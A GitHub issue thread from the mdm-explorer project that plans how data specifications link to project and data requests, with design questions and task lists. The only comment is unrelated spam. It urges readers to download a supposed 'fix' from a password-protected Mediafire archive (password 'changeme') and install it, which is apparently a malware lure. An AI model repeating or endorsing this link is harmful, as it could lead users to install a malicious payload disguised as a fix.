### ISSUE TITLE
Reengineer data specifications and relationships to requests

### ISSUE THREAD

**Issue by NigelPalmer** [MauroDataMapper/mdm-explorer#426]
# Target
Update the workflows so that data specifications are associated with projects, allowing subsequent data requests by selecting a subset of the approved data.

To achieve this, System C shall update the MDE and SDE applications so that:
- Data Specification can be attached to a New Project request.
- Data Specifications can be attached to a Project Change request. Documentation about a data specification that is attached to a Project 

Change request shall make it clear which parts of the previously approved Data Specification are being modified.
- Data Specifications attached to Data Requests should make it clear which fields are not part of the Data Specification that is linked to the Project.

# Approach 
Work with OUH stakeholders to establish a clear design and implementation strategy. 

# Questions for OUH
1.  Are users allowed to add fields that have not been pre-approved to a data request?- **Yes**
 

# Request Submissions
### Requests
- When a Researcher creates a New Project Request they must add a finalised Data Specification that they have created to that request before it can be submitted.
- When a Researcher creates a Project Change Request they may add a finalised Data Specification that they have created to that request before it can be submitted.
- When a Researcher creates a Data Request they must select a finalised Data Specification before the request is created.
- The SDE representations of the Data Request will be generated after the Data Specification is selected and will be attached to the Request. The researcher will have to wait for this process to complete before proceeding.
- When a Request is in Draft state the Data Specification can be deleted from the Request. This will remove the reference to the Data Specification and delete all of the generated attachments that are associated with this specification. 
- SQL file attachments should not be visible to the researcher.

### Data Specifications
When a finalised Data Specification is submitted from the "My Data Specifications" page then:
- A dialog will appear asking what type of Data Submission it is, either "New Project Request", "Project Change Request" or "Data Request".
- If "Data Request" is chosen then a new Data Request will be automatically created and populated with data, representations of the Data Specification will be generated attached to the Request. (Note: This is how the current submit implementation operates)
- A project update request can also have a Data Specification attached to it. This Data Specification will need to highlight which fields are being removed and added to and from the Project. 
- When browsing, if a user has multiple projects then we need to indicate to them which project has approved which field.
- It would be good if the user could choose to filter the data classes and fields they can see to only those that have been pre-approved by the project if they wish to.

## Technical
Request Dialogs live in sde-resources and have no visibility of Data Specifications in the MDE. The New Project and Data Dialog request objects will need a control that when clicked will emit an event. The MDE can then respond to that event and display the list of available Data Specifications that can then be selected from. Once the selection is complete another event would have to fire from the MDE code that the SDE responds to and updates the dialog with the new information. 

### Groundwork
- [x] maurodatamapper/sde-core#231
- [x] maurodatamapper/sde-resources#138
- [x] #457 
### Find Data Specification (Basic)
- [x] maurodatamapper/sde-resources#124
- [x] #438
### Find Data Specification (Full)
- [x] #439 
- [x] #440

- Prevent SQL files from being downloaded by the researcher (sde-resources and sde-core).

- Update the Data Specification submit button so the first step is to select the type of request that needs to be attached. (mdm-explorer)
- [x] maurodatamapper/sde-core#232
- Attached Data Specifications cannot be linked to other requests. Does this need it's own task?

# Data Specification Differences
## Technical
Make use of data model intersections to identify the differences between the Project related Data Specification and the Data Request Specification.

## Tasks
- Update the MDE UX so that every field that is approved in the data request has a visual indicator to make it clear that this field is pre approved. (mdm-explorer)
- Update the Data Specification PDF export so that any fields that are not pre approved are highlighted. (mdm-plugin-explorer)
- Update the Data Request so that there is an indicator that unapproved fields are included when they are not included. (sde-resources)

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
